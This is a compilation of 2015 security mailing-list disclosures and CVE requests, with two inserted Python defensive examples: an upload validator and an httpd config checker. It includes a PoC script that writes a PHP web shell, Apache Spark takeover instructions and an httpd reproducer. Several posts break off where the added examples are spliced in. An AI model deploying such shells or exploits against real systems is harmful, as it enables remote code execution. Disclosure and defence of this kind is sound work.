Henri Salo | 19 Apr 08:45 2015

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

http://seclists.org/bugtraq/2015/Apr/112

Vendor response:

"""
This, I believe, works as designed. There is currently no limit on what a
user can upload.

As this is only possible for authenticated users, we are currently not
considering this a security issue.

If you feel differently, please elaborate why you consider this a security
issue. I guess we could add a strict upload mode.

Cheers, Martijn
"""

Prathan Phongthiproek has requested a CVE identifier for this issue.

Comments? Opinions?

-- 
Henri Salo

Larry W. Cashdollar | 18 Apr 15:06 2015

Exploit for VideoWhisper WP plugins file upload incomplete fix.

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar,  <at> _larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
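
The two posts above (the Wolf CMS "no limit on what a user can upload" response and the note that Debian/Ubuntu map .pht and .phtml to the PHP handler) describe the same defensive gap: an upload filter that only blocks ".php" is not a filter. The following is an added example, not code from either post, Wolf CMS or VideoWhisper; it shows a strict upload policy of the kind the vendor calls a "strict upload mode": a positive extension allowlist, rejection of every PHP-handled extension in any position of the name, and a content check against the claimed format. The PHP_HANDLED set and ALLOWED set are constructed for the example and would be tuned to the server's actual handler configuration.

```python
import os

# Extensions that a stock Debian/Ubuntu php5.conf hands to the PHP interpreter via
# SetHandler (the post above names .phtml and .pht); .phar/.phps and the numbered
# variants are added here as a constructed, deliberately broad list.
PHP_HANDLED = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar", "phps"}

# Positive allowlist: the only extensions this hypothetical upload endpoint accepts.
ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# Leading bytes of the allowed binary formats, used to cross-check the extension.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
]


def sniff(data):
    """Return the format implied by the file's leading bytes, or None."""
    for magic, fmt in MAGIC:
        if data.startswith(magic):
            return fmt
    return None


def is_safe_upload(filename, data):
    """Decide whether an uploaded file may be stored under a web-served directory.

    Returns (ok, reason). Policy: strip any path component, reject dotfiles
    (.htaccess could re-enable handlers), reject a PHP-handled extension in
    *any* position (mod_mime evaluates every extension, so shell.php.jpg is
    as dangerous as shell.php), require the final extension to be on the
    allowlist, and require the content to match the claimed format.
    """
    name = os.path.basename(filename.replace("\\", "/")).lower()
    if not name or name.startswith("."):
        return False, "empty name or dotfile"
    parts = name.split(".")
    if len(parts) < 2:
        return False, "missing extension"
    exts = parts[1:]
    for ext in exts:
        if ext in PHP_HANDLED:
            return False, "php-handled extension ." + ext
    last = exts[-1]
    if last not in ALLOWED:
        return False, "extension ." + last + " not in allowlist"
    if last == "txt":
        # Plain text has no magic; at least insist it is text.
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            return False, "txt upload is not valid UTF-8 text"
        return True, "ok"
    fmt = sniff(data)
    if fmt is None:
        return False, "unrecognised content for ." + last
    if fmt != last and not (fmt == "jpg" and last == "jpeg"):
        return False, "content is " + fmt + " but extension is ." + last
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples: a .pht name carrying PHP, and a PNG-looking blob.
    for fn, blob in [("shell.pht", b"<?php echo 1; ?>"),
                     ("logo.png", b"\x89PNG\r\n\x1a\n\x00")]:
        print(fn, is_safe_upload(fn, blob))
```

The allowlist is the important half: a denylist of PHP extensions alone still misses whatever the next distribution maps to the handler, while an allowlist plus a content check fails closed when a new extension appears.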

Eric Windisch | 17 Apr 17:44 2015

USERNS allows circumventing MNT_LOCKED

In October 2014, Andrey Vagin reported[1] to the Linux Containers list that
it would be possible to use user namespaces to circumvent MNT_LOCKED and
allow unprivileged users to access the directory structure underneath of
mounts. A PoC was also produced and is public.

Patches are now available and proposed to Linus[2].

This may not simply be information disclosure, but containerized
environments may through chroot and mount namespaces mask directory
structures as read-only or inaccessible via the use of bind-mounts. Such
read-only masking may be circumvented by this vulnerability on systems
where these directories are not otherwise protected by MAC (i.e. SELinux or
AppArmor).

Regards,
Eric Windisch

[1] https://groups.google.com/forum/#!topic/linux.kernel/HnegnbXk0Vs
[2] http://www.spinics.net/lists/linux-containers/msg30786.html
Marc Deslauriers | 17 Apr 11:06 2015

CVE Request: PHP potential remote code execution with apache 2.4 apache2handler

Hello,

PHP 5.4.40, 5.5.24 and 5.6.8 fixed a potential remote code execution
vulnerability when used with the Apache 2.4 apache2handler.

https://bugs.php.net/bug.php?id=69218
https://bugs.php.net/bug.php?id=68486 (still private)

Fixed by:

http://git.php.net/?p=php-src.git;a=commit;h=809610f5ea38a83b284e1125d1fff129bdd615e7

Could a CVE please be assigned to this issue?

Thanks,

Marc.

Emmanuel Law | 16 Apr 21:11 2015

[CVE Request] Multiple vulnerabilities in PHP's Phar handling

This serves as a cve request + advisory.

--------Background---------
PHP has the built-in Phar & PharData functionality since 5.3.0. It allows
developers to use them to manipulate the following archive types: tar, zip,
phar. Several vulnerabilities were found in the Phar extension.

[1: CVE Request]
There is a stack based buffer overflow when opening tar, zip or phar
archives through the Phar extension. An attacker can exploit this to run
arbitrary code.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69441
Patch:
http://git.php.net/?p=php-src.git;a=commit;h=f59b67ae50064560d7bfcdb0d6a8ab284179053c

Please assign a CVE for this.

[2: Advisory for CVE-2015-2783]
When processing a specially crafted phar file, it is possible to trigger a
buffer over-read in PHP's unserialize function. An attacker can exploit
this to leak memory information on the system.
Affected versions: PHP < 5.6.8RC1
Bug Report: https://bugs.php.net/bug.php?id=69324
Patch:
http://git.php.net/?p=php-src.git;a=commit;h=17cbd0b5b78a7500f185b3781a2149881bfff8ae

rgds,
Emmanuel

Akhil Das | 16 Apr 20:19 2015

CVE Request: Arbitrary Code Execution in Apache Spark Cluster

# *Vendor Homepage*: https://spark.apache.org/
# *Software Link*: https://spark.apache.org/downloads.html
# *Version*: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# *Tested on*: 1.2.1

# Reference(s) :
http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
# Exploit URL  : https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with a proper firewall can be taken
over easily (since they do not have
# any authentication mechanism); this exploit simply runs arbitrary code
over the cluster.
# All you have to do is find a vulnerable Spark cluster (usually runs on
port 7077), add that host to your
# hosts list so that your system will recognize it (here it's
spark-b-akhil-master pointing
# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with the
arbitrary code that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

/**
 * Created by akhld on 23/3/15.
 */

object Exploit {
  def main(arg: Array[String]) {

Florian Weimer | 16 Apr 14:42 2015

kernel: fs.suid_dumpable=2 privilege escalation

Should this be treated as a security vulnerability?

“fs: make dumpable=2 require fully qualified path”
<http://lwn.net/Articles/503682/>

Some widely-used cronie versions still do not have hardening and parse
commands in core dumps.

-- 
Florian Weimer / Red Hat Product Security

Martin Prpic | 16 Apr 10:08 2015

Potential CVE request: flaw in comment handling

Hi, we were notified of a flaw in the way Apache's mod_access_compat and
mod_authz_host handled comments in configuration files. When a comment
was defined on the same line that contained an "Allow" directive,
any potential IP ranges in that comment were also allowed to access
a resource.

This flaw was fixed in:

https://github.com/apache/httpd/commit/5e1affc271a429f267198eee61fce2b209a83c66

The docs do specify that comments are not allowed on the same line:

"There must be no other characters or white space between the backslash and the end of the line."
[https://httpd.apache.org/docs/2.2/configuring.html#syntax]

MITRE, does this qualify for a CVE?

Reproducer:

$ sudo yum -y install httpd

$ echo hest123 | sudo tee /var/www/html/secret.txt

$ echo '<Location "/secret.txt">
> Order allow,deny
> Allow from 127.0.0.1 # not 10
> </Location>' | sudo tee -a /etc/httpd/conf/httpd.conf
$ sudo service httpd restart

client on 10.x.x.x:
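
Until a fixed httpd is deployed, the practical defence is to find every Allow/Deny line that carries a trailing comment, since the report says each token after the '#' is treated as one more host pattern. The following is an added example, not part of the post above and not Apache's own parser: a small checker over the 2.2-era mod_access_compat / mod_authz_host syntax (Allow from / Deny from, not Require). The SAMPLE_CONF fragment is constructed from the reproducer, and the rule that every whitespace-separated token after '#' becomes a host pattern is an assumption taken from the report's description.

```python
import re

# Constructed httpd.conf fragment modelled on the reproducer above.
SAMPLE_CONF = """\
<Location "/secret.txt">
Order allow,deny
Allow from 127.0.0.1 # not 10
Deny from all
</Location>
# A whole-line comment is fine; only trailing comments on access lines matter.
<Location "/other">
Order deny,allow
Deny from 192.0.2.0/24
Allow from 10.0.0.0/8
</Location>
"""

ACCESS_RE = re.compile(r"^\s*(Allow|Deny)\s+from\s+(.*?)\s*$", re.IGNORECASE)
# Full or partial IPv4 (Apache accepts "10" or "10.1"), optional /mask, or "all".
IPLIKE_RE = re.compile(r"^(all|\d{1,3}(\.\d{1,3}){0,3}(/\S+)?)$", re.IGNORECASE)


def check_access_lines(conf):
    """Return one finding per Allow/Deny line that carries an inline comment.

    Each finding lists the host patterns the administrator intended and the
    comment tokens that, per the report, the affected modules would also
    parse as host patterns; IP-looking tokens are separated out because an
    extra address range on an Allow line widens access silently.
    """
    findings = []
    for lineno, line in enumerate(conf.splitlines(), 1):
        m = ACCESS_RE.match(line)
        if m is None or "#" not in m.group(2):
            continue
        directive, args = m.groups()
        intended, _, trailing = args.partition("#")
        # Assumption from the report: every token after '#' becomes a host pattern.
        tokens = trailing.split()
        findings.append({
            "line": lineno,
            "directive": directive.capitalize(),
            "intended": intended.split(),
            "ip_like": [t for t in tokens if IPLIKE_RE.match(t)],
            "other": [t for t in tokens if not IPLIKE_RE.match(t)],
        })
    return findings


def report(conf):
    """Render findings as one human-readable line each."""
    lines = []
    for f in check_access_lines(conf):
        lines.append(
            "line %d: %s from %s also matches %s (ip-like: %s)" % (
                f["line"], f["directive"], " ".join(f["intended"]),
                " ".join(f["ip_like"] + f["other"]), ", ".join(f["ip_like"]) or "-"))
    return lines


if __name__ == "__main__":
    for text in report(SAMPLE_CONF):
        print(text)
```

Run against a real configuration by reading httpd.conf and every included file into `check_access_lines`; a non-empty result on an Allow line is the case from the reproducer, where "10" would admit the 10.0.0.0/8 clients the comment was meant to exclude.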

Jakub Filak | 15 Apr 11:45 2015

Re: Problems in automatic crash analysis frameworks

Hello,

I have a question regarding the ABRT vulnerabilities. I don't particularly understand how an attacker can
use /proc/pid/exe symlink to force ABRT to read an arbitrary file if the symlink cannot be changed and
kernel refuses to create the process if the symlink's target is not executable.

> This code trusts the /proc/pid/exe symlink, even though it is possible
> to link it anywhere you want.
>
> https://github.com/abrt/abrt/blob/master/src/hooks/abrt-hook-ccpp.c#L368
>
>        sprintf(buf, "/proc/%lu/exe", (long)pid);
>        int src_fd_binary = open(buf, O_RDONLY); /* might fail and
>                                                    return -1, it's ok */

Thank you for clarifying this for me.

Kind regards,
Jakub

Robert Święcki | 15 Apr 15:47 2015

double-free in gnutls (CRL distribution points parsing)

gnutls 3.3.14 fixes a double-free in parsing CRL distribution points.

It will affect applications which parse CRL distribution points or
print contents of certificates with gnutls-provided functions (e.g.
gnutls_x509_crt_print()).

Usually a DoS under modern memory allocators, but creating something more
interesting using double-free exploitation techniques is not out of
the question.

changelists:
https://gitlab.com/gnutls/gnutls/commit/d6972be33264ecc49a86cd0958209cd7363af1e9
https://gitlab.com/gnutls/gnutls/commit/053ae65403216acdb0a4e78b25ad66ee9f444f02

-- 
Robert Święcki

Hanno Böck | 15 Apr 02:39 2015

proftpd: Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy

This sounds serious:
https://github.com/proftpd/proftpd/pull/109
http://bugs.proftpd.org/show_bug.cgi?id=4169
https://cxsecurity.com/issue/WLB-2015040075

When the module mod_copy is enabled one can copy around files on the
server without any authentication.

(Not sure how widespread the use of this module is.)

There is no upstream release with a fix yet.

cu,
-- 
Hanno Böck
http://hboeck.de/

mail/jabber: hanno@...
GPG: BBB51E42
